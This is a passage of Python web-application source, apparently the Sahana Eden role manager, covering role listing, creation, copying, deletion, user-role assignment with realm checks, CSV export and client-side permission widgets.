r.unauthorised() # Validate requested format representation = r.representation if representation == "csv": return self.export_roles(r, **attr) T = current.T response = current.response s3 = response.s3 get_vars = self.request.get_vars # List Config list_id = "roles" list_fields = ["id", "role", (T("UID"), "uuid"), "description", ] default_orderby = "auth_group.role" s3.no_formats = True # Exclude hidden roles resource = self.resource resource.add_filter(FS("hidden") == False) if r.interactive: # Formkey for Ajax-actions formkey = str(uuid.uuid4()) current.session["_formkey[admin/rolelist]"] = formkey # Pagination display_length = s3.dataTable_pageLength or 25 start = None if s3.no_sspag: dt_pagination = "false" limit = None else: dt_pagination = "true" limit = 2 * display_length # Generate Data Table dt, totalrows = resource.datatable(fields = list_fields, start = start, limit = limit, left = [], orderby = default_orderby, ) # Render the Data Table datatable = dt.html(totalrows, totalrows, id = list_id, dt_pagination = dt_pagination, dt_pageLength = display_length, dt_base_url = r.url(method="", vars={}), dt_permalink = r.url(), dt_formkey = formkey, ) # Configure action buttons self.role_list_actions(r) # View response.view = "admin/roles.html" # Page actions crud_button = S3CRUD.crud_button page_actions = DIV(crud_button(T("Create Role"), _href = r.url(method="create"), ), # TODO activate when implemented #crud_button(T("Import Roles"), # _href = r.url(method="import"), # ), crud_button(T("Export Roles"), _href = r.url(representation="csv"), ), ) # Output output = {"title": T("User Roles"), "items": datatable, "page_actions": page_actions, } elif representation == "aadata": # Page limits start, limit = S3CRUD._limits(get_vars) # Data Table Filter and Sorting searchq, orderby, left = resource.datatable_filter(list_fields, get_vars, ) if searchq is not None: totalrows = resource.count() resource.add_filter(searchq) else: totalrows = None if orderby is None: orderby = default_orderby # Data Table if totalrows != 0: dt, displayrows = resource.datatable(fields = list_fields, start = start, limit = limit, left = left, orderby = orderby, ) else: dt, displayrows = None, 0 if totalrows is None: totalrows = displayrows # Echo draw = int(get_vars.get("draw", 0)) # Representation if dt is not None: output = dt.json(totalrows, displayrows, list_id, draw) else: output = '{"recordsTotal":%s,' \ '"recordsFiltered":0,' \ '"dataTable_id":"%s",' \ '"draw":%s,' \ '"data":[]}' % (totalrows, list_id, draw) else: r.error(415, current.ERROR.BAD_FORMAT) return output # ------------------------------------------------------------------------- def role_list_actions(self, r): """ Configure action buttons for role list @param r: the S3Request """ T = current.T s3 = current.response.s3 sr = current.auth.get_system_roles() table = self.table # Standard actions s3.actions = None s3.crud_labels.UPDATE = T("Edit") S3CRUD.action_buttons(r, editable=True, deletable=False) action_button = S3CRUD.action_button # Users label = T("Users") excluded = [str(sr.AUTHENTICATED), str(sr.ANONYMOUS)] action_button(label, URL(args=["[id]", "users"]), exclude = excluded, _title = s3_str(T("Assign this role to users")), ) action_button(label, None, restrict = excluded, _disabled = "disabled", _title = s3_str(T("This role is assigned automatically")), ) # Copy-button Ajax label = T("Copy") excluded = [str(sr.ADMIN)] action_button(label, None, _ajaxurl = URL(args=["[id]", "copy.json"]), exclude = excluded, _title = s3_str(T("Copy this role to create a new role")), _class = "action-btn copy-role-btn", ) action_button(label, None, restrict = excluded, _disabled = "disabled", _title = s3_str(T("This role cannot be copied")), ) question = T("Create a copy of this role?") script = '''var dt=$('#roles');dt.on('click','.copy-role-btn',dt.dataTableS3('ajaxAction','%s'));''' % question s3.jquery_ready.append(script) # Delete-button Ajax label = T("Delete") query = (table.deleted == False) & \ ((table.system == True) | (table.protected == True)) protected_roles = current.db(query).select(table.id) excluded = [str(role.id) for role in protected_roles] action_button(label, None, _ajaxurl = URL(args=["[id]", "delete.json"]), _class = "delete-btn-ajax action-btn dt-ajax-delete", exclude = excluded, ) action_button(label, None, restrict = excluded, _disabled = "disabled", _title = s3_str(T("This role cannot be deleted")), ) # ------------------------------------------------------------------------- def role_form(self, r, **attr): """ Create, read, update a role NB this function must be restricted to ADMINs (in apply_method) """ T = current.T s3 = current.response.s3 settings = current.deployment_settings output = {} method = r.method record = r.record # Read-only? readonly = False if r.record: if r.interactive: readonly = method == "read" elif r.representation == "csv": return self.export_roles(r, **attr) else: r.error(415, current.ERROR.BAD_FORMAT) # Form fields table = r.table # UID uid = table.uuid uid.label = T("UID") uid.readable = True uid.writable = False if record and record.system else True # Role name role = table.role role.label = T("Name") # Role description description = table.description description.label = T("Description") description.widget = s3_comments_widget # Permissions PERMISSIONS = T("Permissions") permissions = Field("permissions", label = PERMISSIONS, widget = S3PermissionWidget(r.id), ) if record and record.uuid == "ADMIN": # Administrator permissions cannot be edited permissions.readable = permissions.writable = False elif not current.auth.permission.use_cacls: # Security policy does not use configurable permissions if record: record.permissions = None permissions.widget = self.policy_hint elif readonly: # Read-only view (dummy) - just hide permissions permissions.readable = permissions.writable = False elif record: # Populate the field with current permissions record.permissions = self.get_permissions(record) # Mark required if not readonly: labels, s3.has_required = s3_mark_required(table, []) labels["permissions"] = "%s:" % s3_str(PERMISSIONS) else: labels = None # Form buttons if not readonly: submit_button = INPUT(_class = "small primary button", _type = "submit", _value = T("Save"), ) cancel_button = A(T("Cancel"), _class="cancel-form-btn action-lnk", _href = r.url(id=""), ) buttons = [submit_button, cancel_button] else: buttons = ["submit"] # Form style crudopts = s3.crud formstyle = crudopts.formstyle_read if readonly else crudopts.formstyle # Render form tablename = "auth_group" form = SQLFORM.factory(uid, role, description, permissions, record = record, showid = False, labels = labels, formstyle = formstyle, table_name = tablename, upload = s3.download_url, readonly = readonly, separator = "", submit_button = settings.submit_button, buttons = buttons, ) form.add_class("rm-form") output["form"] = form # Navigate-away confirmation if crudopts.navigate_away_confirm: s3.jquery_ready.append("S3EnableNavigateAwayConfirm()") # Process form response = current.response formname = "%s/%s" % (tablename, record.id if record else None) if form.accepts(current.request.post_vars, current.session, #onvalidation = self.validate, formname = formname, keepvalues = False, hideerror = False, ): role_id, message = self.update_role(record, form) if role_id: response.confirmation = message self.next = r.url(id="", method="") else: response.error = message elif form.errors: response.error = T("There are errors in the form, please check your input") # Title if record: if readonly: output["title"] = record.role else: output["title"] = T("Edit Role: %(role)s") % {"role": record.role} else: output["title"] = T("Create Role") # View response.view = "admin/role_form.html" return output # ------------------------------------------------------------------------- @staticmethod def policy_hint(field, value, **attr): """ Show a hint if permissions cannot be edited due to security policy @param field: the Field instance @param value: the current field value (ignored) @param attr: DOM attributes for the widget (ignored) """ T = current.T warn = T("The current system configuration uses hard-coded access rules (security policy %(policy)s).") % \ {"policy": current.deployment_settings.get_security_policy()} hint = T("Change to security policy 3 or higher if you want to define permissions for roles.") return DIV(SPAN(warn, _class="rm-fixed"), SPAN(hint, _class="rm-hint"), INPUT(_type = "hidden", _name = field.name, _value= "", ), ) # ------------------------------------------------------------------------- @staticmethod def get_permissions(role): """ Extract the permission rules for a role @param role: the role (Row) @returns: the permission rules as JSON string """ permissions = current.auth.permission rules = [] table = permissions.table if table: query = (table.group_id == role.id) & \ (table.deleted == False) if not permissions.use_facls: query &= (table.function == None) if not permissions.use_tacls: query &= (table.tablename == None) rows = current.db(query).select(table.id, table.controller, table.function, table.tablename, table.uacl, table.oacl, table.entity, table.unrestricted, ) for row in rows: if row.unrestricted: entity = "any" else: entity = row.entity rules.append([row.id, row.controller, row.function, row.tablename, row.uacl, row.oacl, entity, False, # delete-flag ]) return json.dumps(rules, separators=SEPARATORS) # ------------------------------------------------------------------------- def update_role(self, role, form): """ Create or update a role from a role form @param role: the role (Row) @param form: the form @returns: tuple (role ID, confirmation message) """ T = current.T auth = current.auth formvars = form.vars rolename = formvars.role uid = formvars.uuid if role: role_id = role.id data = {"role": rolename, "description": formvars.description, } if uid is not None: data["uuid"] = uid role.update_record(**data) else: data = {"role": rolename} role_id = auth.s3_create_role(rolename, description = formvars.description, uid = uid, ) if role_id: # Update permissions permissions = formvars.permissions if permissions: self.update_permissions(role_id, permissions) if not role: message = T("Role %(role)s created") % data else: message = T("Role %(role)s updated") % data else: if not role: message = T("Failed to create role %(role)s") % data else: message = T("Failed to update role %(role)s") % data return role_id, message # ------------------------------------------------------------------------- @staticmethod def update_permissions(role_id, rules): """ Update the permission rules for a role @param role_id: the role record ID (auth_group.id) @param rules: the rules as JSON string """ table = current.auth.permission.table if table: db = current.db rules = json.loads(rules) for rule in rules: rule_id = rule[0] deleted = rule[7] if rule_id is None: continue if not any(rule[i] for i in (1, 2, 3)): continue if rule_id and deleted: db(table.id == rule_id).update(deleted=True) else: entity = rule[6] if entity == "any": unrestricted = True entity = None else: unrestricted = False try: entity = long(entity) if entity else None except (ValueError, TypeError): entity = None data = {"group_id": role_id, "controller": rule[1], "function": rule[2], "tablename": rule[3], "uacl": rule[4], "oacl": rule[5], "entity": entity, "unrestricted": unrestricted, } if rule_id: # Update the rule db(table.id == rule_id).update(**data) else: # Add the rule table.insert(**data) # ------------------------------------------------------------------------- @staticmethod def copy_role(r, **attr): """ Duplicate an existing role NB this function must be restricted to ADMINs (in apply_method) """ # CSRF Protection key = current.session["_formkey[admin/rolelist]"] if not key or r.post_vars.get("_formkey") != key: r.error(403, current.ERROR.NOT_PERMITTED) elif r.http != "POST": r.error(405, current.ERROR.BAD_METHOD) db = current.db role = r.record if not role: r.error(400, current.ERROR.BAD_RECORD) # Find a suitable uuid and name table = r.table query = ((table.uuid.like("%s%%" % role.uuid)) | \ (table.role.like("%s%%" % role.role))) rows = db(query).select(table.uuid, table.role, ) uids = set(row.uuid for row in rows) names = set(row.role for row in rows) uid = name = None for i in range(2, 1000): if not uid: uid = "%s%s" % (role.uuid, i) if uid in uids: uid = None if not name: name = "%s-%s" % (role.role, i) if name in names: name = None if uid and name: break if not uid: uid = str(uuid.uuid4()) if not name: name = str(uuid.uuid4()) # Create the new role role_id = table.insert(uuid = uid, role = name, ) # Copy permissions ptable = current.auth.permission.table if ptable: query = (ptable.group_id == role.id) & \ (ptable.deleted == False) rules = db(query).select(ptable.controller, ptable.function, ptable.tablename, ptable.record, ptable.oacl, ptable.uacl, ptable.entity, ptable.unrestricted, ) for rule in rules: ptable.insert(group_id = role_id, controller = rule.controller, function = rule.function, tablename = rule.tablename, record = rule.record, oacl = rule.oacl, uacl = rule.uacl, entity = rule.entity, unrestricted = rule.unrestricted, ) message = current.T("New Role %(role)s created") % {"role": name} return current.xml.json_message(message=message) # ------------------------------------------------------------------------- @staticmethod def delete_role(r, **attr): """ Delete a role NB this function must be restricted to ADMINs (in apply_method) """ # CSRF Protection key = current.session["_formkey[admin/rolelist]"] if not key or r.post_vars.get("_formkey") != key: r.error(403, current.ERROR.NOT_PERMITTED) elif r.http not in ("POST", "DELETE"): r.error(405, current.ERROR.BAD_METHOD) role = r.record if not role: r.error(400, current.ERROR.BAD_RECORD) if role.protected or role.system: r.error(403, current.ERROR.NOT_PERMITTED) auth = current.auth auth.s3_delete_role(role.id) auth.s3_set_roles() message = current.T("Role %(role)s deleted") % {"role": role.role} return current.xml.json_message(message=message) # ------------------------------------------------------------------------- def assign_roles(self, r, **attr): """ Assign/unassign roles to a user NB this function is accessible for non-ADMINs (e.g. ORG_ADMIN) """ auth = current.auth # Require a primary record if not r.record: r.error(400, current.ERRORS.BAD_RECORD) # Require permission to create or delete group memberships mtable = auth.settings.table_membership permitted = auth.s3_has_permission if not permitted("create", mtable) and not permitted("delete", mtable): r.unauthorised() # Require that the target user record belongs to a managed organisation pe_ids = auth.get_managed_orgs() if not pe_ids: r.unauthorised() elif pe_ids is not True: otable = current.s3db.org_organisation utable = auth.settings.table_user query = (utable.id == r.id) & \ (otable.id == utable.organisation_id) & \ (otable.pe_id.belongs(pe_ids)) row = current.db(query).select(utable.id, limitby=(0, 1)).first() if not row: r.unauthorised() # Which roles can the current user manage for this user? managed_roles = self.get_managed_roles(r.id) output = {} if r.http == "GET": T = current.T # Page Title userfield = auth.settings.login_userfield user_name = r.record[userfield] output["title"] = "%s: %s" % (T("Roles of User"), user_name) # Should we use realms? use_realms = auth.permission.entity_realm if use_realms: realm_types, realms = self.get_managed_realms() else: realm_types, realms = None, None # The Ajax URL for role updates ajax_url = r.url(id="[id]", representation="json") # The form field field = mtable.user_id field.readable = field.writable = True field.widget = S3RolesWidget(mode = "roles", items = managed_roles, use_realms = use_realms, realm_types = realm_types, realms = realms, ajax_url = ajax_url, ) # Render form s3 = current.response.s3 tablename = str(mtable) form = SQLFORM.factory(field, record = {"id": None, "user_id": r.id}, showid = False, labels = {field.name: ""}, formstyle = s3.crud.formstyle, table_name = tablename, upload = s3.download_url, #readonly = readonly, separator = "", submit_button = False, buttons = [], ) form.add_class("rm-form") output["form"] = form # Show a back-button since OrgAdmins have no other obvious # way to return to the list (no left menu) crud_button = S3CRUD.crud_button output["list_btn"] = crud_button(T("Back to User List"), icon = "return", _href = r.url(id="", method=""), ) # View response = current.response response.view = "admin/role_form.html" elif r.http == "POST": if r.representation == "json": # Read+parse body JSON s = r.body s.seek(0) try: options = json.load(s) except JSONERRORS: options = None if not isinstance(options, dict): r.error(400, "Invalid request options") user_id = r.record.id added = options.get("add") removed = options.get("remove") # Validate if added: for group_id, pe_id in added: role = managed_roles.get(group_id) if not role or role.get("a") is False: r.error(403, current.ERROR.NOT_PERMITTED) if removed: for group_id, pe_id in removed: role = managed_roles.get(group_id) if not role or role.get("r") is False: r.error(403, current.ERROR.NOT_PERMITTED) # Update role assignments if added: add_role = auth.s3_assign_role for group_id, pe_id in added: add_role(user_id, group_id, for_pe=pe_id) if removed: remove_role = auth.s3_withdraw_role for group_id, pe_id in removed: remove_role(user_id, group_id, for_pe=pe_id) output = current.xml.json_message(options=options) else: r.error(415, current.ERROR.BAD_FORMAT) else: r.error(405, current.ERROR.BAD_METHOD) return output # ------------------------------------------------------------------------- def assign_users(self, r, **attr): """ Assign/unassign users to a role NB this function could be accessible for non-ADMINs (e.g. ORG_ADMIN) """ auth = current.auth # Require a primary record role = r.record if not role: r.error(400, current.ERRORS.BAD_RECORD) # Require permission to create or delete group memberships mtable = auth.settings.table_membership permitted = auth.s3_has_permission if not permitted("create", mtable) and not permitted("delete", mtable): r.unauthorised() # Require that the target role belongs to managed roles managed_roles = self.get_managed_roles(None) if role.id not in managed_roles: r.unauthorised() s3 = current.response.s3 # Which users can the current user manage? managed_users = self.get_managed_users(role.id) # Special rules for system roles sr = auth.get_system_roles() unrestrictable = (sr.ADMIN, sr.AUTHENTICATED, sr.ANONYMOUS) unassignable = (sr.AUTHENTICATED, sr.ANONYMOUS) output = {} if r.http == "GET": T = current.T # Page Title output["title"] = "%s: %s" % (T("Users with Role"), role.role) # Should we use realms? use_realms = auth.permission.entity_realm and \ role.id not in unrestrictable if use_realms: realm_types, realms = self.get_managed_realms() else: realm_types, realms = None, None # The Ajax URL for role updates ajax_url = r.url(id="[id]", representation="json") # The form field field = mtable.group_id field.readable = field.writable = True field.widget = S3RolesWidget(mode="users", items = managed_users, use_realms = use_realms, realm_types = realm_types, realms = realms, ajax_url = ajax_url, ) # Render form tablename = str(mtable) form = SQLFORM.factory(field, record = {"id": None, "group_id": role.id}, showid = False, labels = {field.name: ""}, formstyle = s3.crud.formstyle, table_name = tablename, upload = s3.download_url, #readonly = readonly, separator = "", submit_button = False, buttons = [], ) form.add_class("rm-form") output["form"] = form # Default RHeader and View if "rheader" not in attr: return_btn = S3CRUD.crud_button("Back to Roles List", icon = "return", _href=r.url(id="", method=""), ) output["rheader"] = DIV(return_btn, _class="rheader", ) response = current.response response.view = "admin/role_form.html" elif r.http == "POST": if r.representation == "json": # Process Ajax-request from S3RolesWidget # Read+parse body JSON s = r.body s.seek(0) try: options = json.load(s) except JSONERRORS: options = None if not isinstance(options, dict): r.error(400, "Invalid request options") added = options.get("add") removed = options.get("remove") # Validate group_id = role.id if group_id in unassignable: r.error(403, current.ERROR.NOT_PERMITTED) if added: for user_id, pe_id in added: user = managed_users.get(user_id) if not user or user.get("a") is False: r.error(403, current.ERROR.NOT_PERMITTED) if removed: for user_id, pe_id in removed: user = managed_users.get(user_id) if not user or user.get("r") is False: r.error(403, current.ERROR.NOT_PERMITTED) # Update role assignments if added: add_role = auth.s3_assign_role for user_id, pe_id in added: add_role(user_id, group_id, for_pe=pe_id) if removed: remove_role = auth.s3_withdraw_role for user_id, pe_id in removed: remove_role(user_id, group_id, for_pe=pe_id) output = current.xml.json_message(options=options) else: r.error(415, current.ERROR.BAD_FORMAT) else: r.error(405, current.ERROR.BAD_METHOD) return output # ------------------------------------------------------------------------- @staticmethod def get_managed_users(role_id): """ Get a dict of users the current user can assign to roles @param role_id: the target role ID @returns: a dict {user_id: {l:label, t:title, a:assignable, r:removable, u:unrestrictable, }, ...} NB a, r and u attributes only added if non-default """ auth = current.auth auth_settings = auth.settings sr = auth.get_system_roles() admin_role = role_id == sr.ADMIN unassignable = role_id in (sr.AUTHENTICATED, sr.ANONYMOUS) unrestrictable = role_id in (sr.ADMIN, sr.AUTHENTICATED, sr.ANONYMOUS) current_user = auth.user.id if auth.user else None users = {} pe_ids = auth.get_managed_orgs() if pe_ids: utable = auth_settings.table_user query = (utable.deleted == False) if pe_ids is not True: otable = current.s3db.org_organisation query &= (otable.id == utable.organisation_id) & \ (otable.pe_id.belongs(pe_ids)) userfield = auth_settings.login_userfield rows = current.db(query).select(utable.id, utable.first_name, utable.last_name, utable[userfield], ) for row in rows: user_id = row.id user = {"l": row[userfield], "t": "%s %s" % (row.first_name, row.last_name, ), } if unrestrictable: user["u"] = True if admin_role and user_id == current_user: # ADMINs cannot remove their own ADMIN role user["r"] = False if unassignable: user["a"] = user["r"] = False users[user_id] = user return users # ------------------------------------------------------------------------- @staticmethod def get_managed_roles(user_id): """ Get a dict of roles the current user can manage @returns: a dict {role_id: {l:label, a:assignable, r:removable, u:unrestrictable, }, ...}, NB a, r and u attributes only added if non-default """ auth = current.auth sr = auth.get_system_roles() AUTO = (sr.AUTHENTICATED, sr.ANONYMOUS) ADMINS = (sr.ADMIN, sr.ORG_ADMIN, sr.ORG_GROUP_ADMIN) UNRESTRICTABLE = (sr.ADMIN, sr.AUTHENTICATED, sr.ANONYMOUS) table = auth.settings.table_group query = (table.hidden == False) & \ (table.deleted == False) rows = current.db(query).select(table.id, table.uuid, table.role, ) has_role = auth.s3_has_role roles = {} for row in rows: role = {"l": row.role or row.uuid} role_id = row.id if role_id in ADMINS: assignable = has_role(role_id) else: assignable = role_id not in AUTO if role_id == sr.ADMIN and auth.user.id == user_id: removable = False else: removable = assignable if not assignable: role["a"] = False if not removable: role["r"] = False if role_id in UNRESTRICTABLE: role["u"] = True roles[role_id] = role return roles # ------------------------------------------------------------------------- @staticmethod def get_managed_realms(): """ Get a dict of realms managed by the current user @returns: tuple (realm_types, realms): - realm_types = [(instance_type, label), ...] - realms = {pe_id: {l:label, t:type}, ...} """ T = current.T t_ = lambda v: s3_str(T(v)) realm_types = [(None, t_("Multiple"))] realms = {None: {"l": t_("Default Realm"), "t": None}, } # Look up the realms managed by the current user pe_ids = [] auth = current.auth sr = auth.get_system_roles() has_role = auth.s3_has_role is_admin = has_role(sr.ADMIN) if is_admin: # Only ADMIN can assign roles site-wide realms[0] = {"l": t_("All Entities"), "t": None} else: if has_role(sr.ORG_GROUP_ADMIN): role_realms = auth.user.realms[sr.ORG_GROUP_ADMIN] if role_realms: pe_ids.extend(role_realms) if has_role(sr.ORG_ADMIN): role_realms = auth.user.realms[sr.ORG_ADMIN] if role_realms: pe_ids.extend(role_realms) # Get entities and types s3db = current.s3db types = current.deployment_settings.get_auth_realm_entity_types() entities = s3db.pr_get_entities(pe_ids = pe_ids, types = types, group = True, show_instance_type = False, ) # Add representations for entities and types instance_type_nice = s3db.pr_pentity.instance_type.represent for instance_type in types: entity_group = entities.get(instance_type) if not entity_group: continue realm_types.append((instance_type, s3_str(instance_type_nice(instance_type)), )) for pe_id, name in entity_group.items(): realms[pe_id] = {"l": s3_str(name), "t": instance_type} return realm_types, realms # ------------------------------------------------------------------------- def import_roles(self, r, **attr): """ Interactive import of roles (auth_roles.csv format) NB this function must be restricted to ADMINs (in apply_method) """ # TODO implement roles importer T = current.T output = {} # Title output["title"] = T("Import Roles") # View response = current.response response.view = "admin/import_roles.html" return output # if GET: # show an import form # elif POST: # import the submitted file using Bulk-importer # ------------------------------------------------------------------------- @staticmethod def export_roles(r, **attr): """ Export of roles (auth_roles.csv format) NB this function must be restricted to ADMINs (in apply_method) """ output = S3RolesExport(r.resource).as_csv() # Response headers from gluon.contenttype import contenttype filename = "auth_roles.csv" disposition = "attachment; filename=\"%s\"" % filename response = current.response response.headers["Content-Type"] = contenttype(".csv") response.headers["Content-disposition"] = disposition return output.read() # ============================================================================= class S3PermissionWidget(object): """ Form widget to modify permissions of a role """ def __init__(self, role_id=None): """ Constructor """ sr = current.auth.get_system_roles() if role_id == sr.ANONYMOUS: default_roles = () elif role_id == sr.AUTHENTICATED: default_roles = (sr.ANONYMOUS,) else: default_roles = (sr.ANONYMOUS, sr.AUTHENTICATED) self.default_roles = default_roles # ------------------------------------------------------------------------- def __call__(self, field, value, **attributes): """ Form builder entry point @param field: the Field @param value: the current (or default) value of the field @param attributes: HTML attributes for the widget """ T = current.T # Widget ID widget_id = attributes.get("_id") or str(field).replace(".", "_") # Field name name = attributes.get("_name") or field.name # Page access rules tab+pane prules_id = "%s-prules" % widget_id prules_tab = LI(A(T("Page Access"), _href = "#" + prules_id, ) ) prules_pane = DIV(_id = prules_id, _class = "rm-page-rules", ) # Table access rules tab+page rules = current.auth.permission use_tacls = rules.use_tacls if use_tacls: trules_id = "%s-trules" % widget_id trules_tab = LI(A(T("Table Access"), _href = "#" + trules_id, ), ) trules_pane = DIV(_id = trules_id, _class = "rm-table-rules", ) else: trules_pane = "" trules_tab = "" # Construct the widget widget = DIV(INPUT(_type = "hidden", _name = name, _value = value, _id = widget_id + "-input", ), DIV(UL(trules_tab, prules_tab, ), trules_pane, prules_pane, _class = "rm-rules hide" ), _id = widget_id, ) # Module header icons rtl = current.response.s3.rtl icons = {"expanded": "fa fa-caret-down", "collapsed": "fa fa-caret-left" if rtl else "fa fa-caret-right", } # Client-side widget options widget_opts = {"fRules": rules.use_facls, "tRules": use_tacls, "useRealms": rules.entity_realm, "permissions": self.get_permissions(), "defaultPermissions": self.get_default_permissions(), "modules": self.get_active_modules(), "icons": icons, } if use_tacls: widget_opts["models"] = self.get_active_models() # Localized strings for client-side widget i18n = {"rm_Add": T("Add"), "rm_AddRule": T("Add Rule"), "rm_AllEntities": T("All Entities"), "rm_AllRecords": T("All Records"), "rm_AssignedEntities": T("Assigned Entities"), "rm_Cancel": T("Cancel"), "rm_CollapseAll": T("Collapse All"), "rm_ConfirmDeleteRule": T("Do you want to delete this rule?"), "rm_Default": T("default"), "rm_DeleteRule": T("Delete"), "rm_ExpandAll": T("Expand All"), "rm_NoAccess": T("No access"), "rm_NoRestrictions": T("No restrictions"), "rm_Others": T("Others"), "rm_OwnedRecords": T("Owned Records"), "rm_Page": T("Page"), "rm_RestrictedTables": T("Restricted Tables"), "rm_Scope": T("Scope"), "rm_SystemTables": T("System Tables"), "rm_Table": T("Table"), "rm_UnrestrictedTables": T("Unrestricted Tables"), } # Inject the client-side script self.inject_script(widget_id, widget_opts, i18n) return widget # ------------------------------------------------------------------------- @staticmethod def get_active_modules(): """ Get a JSON-serializable dict of active modules @returns: a dict {prefix: (name_nice, restricted)} """ # Modules where access rules do not apply (or are hard-coded) exclude = ("appadmin", "errors") # Active modules modules = current.deployment_settings.modules active= {k: (s3_str(modules[k].name_nice), modules[k].restricted) for k in modules if k not in exclude } # Special controllers for dynamic models if current.auth.permission.use_facls: active["default/dt"] = (s3_str(current.T("Dynamic Models")), True) return active # ------------------------------------------------------------------------- def get_active_models(self): """ Get a JSON-serializable dict of active data models @returns: a dict {prefix: {tablename: restricted}} """ # Get all table names db_tables = current.cache.ram("permission_widget_all_tables", self.get_db_tables, time_expire = 14400, ) # Count the number of restricting roles per table # @see: S3Permission.table_restricted() rtable = current.auth.permission.table query = (rtable.tablename != None) & \ (rtable.controller == None) & \ (rtable.function == None) & \ (rtable.deleted == False) numroles = rtable.group_id.count() tablename = rtable.tablename rows = current.db(query).select(tablename, numroles, groupby = tablename, ) restrictions = {row[tablename]: row[numroles] for row in rows} # Sort tablenames after module and mark number of restrictions models = {} for tablename in db_tables: prefix = tablename.split("_", 1)[0] if prefix in ("auth", "sync", "s3", "scheduler"): prefix = "_system" if prefix not in models: models[prefix] = {} models[prefix][tablename] = restrictions.get(tablename, 0) return models # ------------------------------------------------------------------------- @staticmethod def get_db_tables(): """ Return all table names in the database; in separate function to allow caching because it requires to load all models once @returns: db.tables """ db = current.db s3db = current.s3db # Load all static models s3db.load_all_models() # Load all dynamic tables (TODO: how does this make sense?) #ttable = s3db.s3_table #rows = db(ttable.deleted != True).select(ttable.name) #for row in rows: # s3db.table(row.name) return db.tables # ------------------------------------------------------------------------- @staticmethod def get_permissions(): """ Get a JSON-serializable list of permissions @returns: an ordered list of dicts: [{l: label, b: bit, o: relevant for owned records, }, ... ] """ permission = current.auth.permission opts = permission.PERMISSION_OPTS skip = 0x0000 # Hide approval-related permissions if record approval is disabled if not current.deployment_settings.get_auth_record_approval(): skip |= permission.REVIEW | permission.APPROVE output = [] for bit, label in opts.items(): if bit & skip: continue output.append({"l": s3_str(label), "b": bit, "o": bit != permission.CREATE, }) return output # ------------------------------------------------------------------------- def get_default_permissions(self): """ Get default permissions, i.e. those granted by roles the user has by default @returns: a dict {tablename: (uACL, oACL)} """ permissions = current.auth.permission table = permissions.table default_roles = self.default_roles default_permissions = {} if table and default_roles: query = (table.group_id.belongs(default_roles)) if not permissions.use_facls: query &= (table.function == None) if not permissions.use_tacls: query &= (table.tablename == None) query &= (table.deleted == False) rows = current.db(query).select(table.controller, table.function, table.tablename, table.uacl, table.oacl, ) for row in rows: target = row.tablename if not target: c = row.controller if c: target = "%s/%s" % (c, row.function or "*") else: continue rules = default_permissions.get(target) if rules: default_permissions[target] = (rules[0] | row.uacl, rules[1] | row.oacl, ) else: default_permissions[target] = (row.uacl, row.oacl) return default_permissions # ------------------------------------------------------------------------- def inject_script(self, widget_id, options, i18n): """ Inject the necessary JavaScript for the widget @param widget_id: the widget ID (=element ID of the person_id field) @param options: JSON-serializable dict of widget options @param i18n: translations of screen messages rendered by the client-side script, a dict {messageKey: translation} """ s3 = current.response.s3 # Static script if s3.debug: script = "/%s/static/scripts/S3/s3.ui.permissions.js" % \ current.request.application else: script = "/%s/static/scripts/S3/s3.ui.permissions.min.js" % \ current.request.application scripts = s3.scripts if script not in scripts: scripts.append(script) self.inject_i18n(i18n) # Widget options opts = {} if options: opts.update(options) # Widget instantiation script = '''$('#%(widget_id)s').permissionEdit(%(options)s)''' % \ {"widget_id": widget_id, "options": json.dumps(opts, separators=SEPARATORS), } jquery_ready = s3.jquery_ready if script not in jquery_ready: jquery_ready.append(script) # ------------------------------------------------------------------------- @staticmethod def inject_i18n(labels): """ Inject translations for screen messages rendered by the client-side script @param labels: dict of translations {messageKey: translation} """ strings = ['''i18n.%s="%s"''' % (k, s3_str(v)) for k, v in labels.items()] current.response.s3.js_global.append("\n".join(strings)) # ============================================================================= class S3RolesWidget(object): """ Form widget to assign roles to users """ def __init__(self, mode="roles", items=None, use_realms=False, realm_types=None, realms=None, ajax_url=None, ): """ Constructor @param mode: what to assign ("roles"|"users") @param items: the assignable items (roles or users), dict, structure see get_managed_roles/get_managed_users @param use_realms: boolean, whether to use realms @param realm_types: the realm types and their labels, tuple, format see get_managed_realms @param realms: the realms, dict, structure see get_managed_realms @param ajax_url: the URL for Ajax modification of assignments """ self.mode = mode self.items = items self.use_realms = use_realms self.realm_types = realm_types self.realms = realms self.ajax_url = ajax_url # ------------------------------------------------------------------------- def __call__(self, field, value, **attributes): """ Form builder entry point @param field: the Field @param value: the current (or default) value of the field @param attributes: HTML attributes for the widget """ T = current.T # Widget ID widget_id = attributes.get("_id") or str(field).replace(".", "_") # Field name name = attributes.get("_name") or field.name # Extract the current assignments if value: assignments = self.get_current_assignments(value) else: assignments = [] # Construct the widget widget = DIV(INPUT(_type = "hidden", _name = name, _value = value, _id = widget_id + "-id", ), INPUT(_type = "hidden", _name = "assigned", _value = json.dumps(assignments, separators=SEPARATORS), _id = widget_id + "-data", ), _id = widget_id, _class = "rm-assign-widget", ) # Client-side widget options widget_opts = {"mode": self.mode, "ajaxURL": self.ajax_url, "items": self.items, "useRealms": self.use_realms, "realms": self.realms, "realmTypes": self.realm_types, } # Localized strings for client-side widget if self.mode == "roles": CONFIRM = T("Do you want to remove the %(role)s role?") else: CONFIRM = T("Do you want to remove %(user)s from this role?") i18n = {"rm_Add": T("Add"), "rm_Cancel": T("Cancel"), "rm_ConfirmDeleteAssignment": CONFIRM, "rm_Delete": T("Delete"), "rm_DeletionFailed": T("Deletion Failed"), "rm_ForEntity": T("For Entity"), "rm_Roles": T("Roles"), "rm_SubmissionFailed": T("Submission Failed"), "rm_Users": T("Users"), } # Inject the client-side script self.inject_script(widget_id, widget_opts, i18n) return widget # ------------------------------------------------------------------------- def get_current_assignments(self, record_id): """ Get the current assignments for the user/role @param record_id: the user or role ID @returns: a list of tuples (roleID|userID, realmID) """ auth = current.auth table = auth.settings.table_membership if self.mode == "roles": query = (table.user_id == record_id) & \ (table.group_id.belongs(set(self.items.keys()))) field = table.group_id else: query = (table.group_id == record_id) & \ (table.user_id.belongs(set(self.items.keys()))) field = table.user_id use_realms = self.use_realms if use_realms and \ not auth.s3_has_role(auth.get_system_roles().ADMIN): managed_realms = set(self.realms.keys()) none = None in managed_realms managed_realms.discard(None) q = (table.pe_id.belongs(managed_realms)) if managed_realms else None if none: n = (table.pe_id == None) q = q | n if q else n if q: query &= q query &= (table.deleted == False) rows = current.db(query).select(field, table.pe_id) assignments = set() for row in rows: pe_id = row.pe_id if use_realms else None assignments.add((row[field], pe_id)) return list(assignments) # ------------------------------------------------------------------------- def inject_script(self, widget_id, options, i18n): """ Inject the necessary 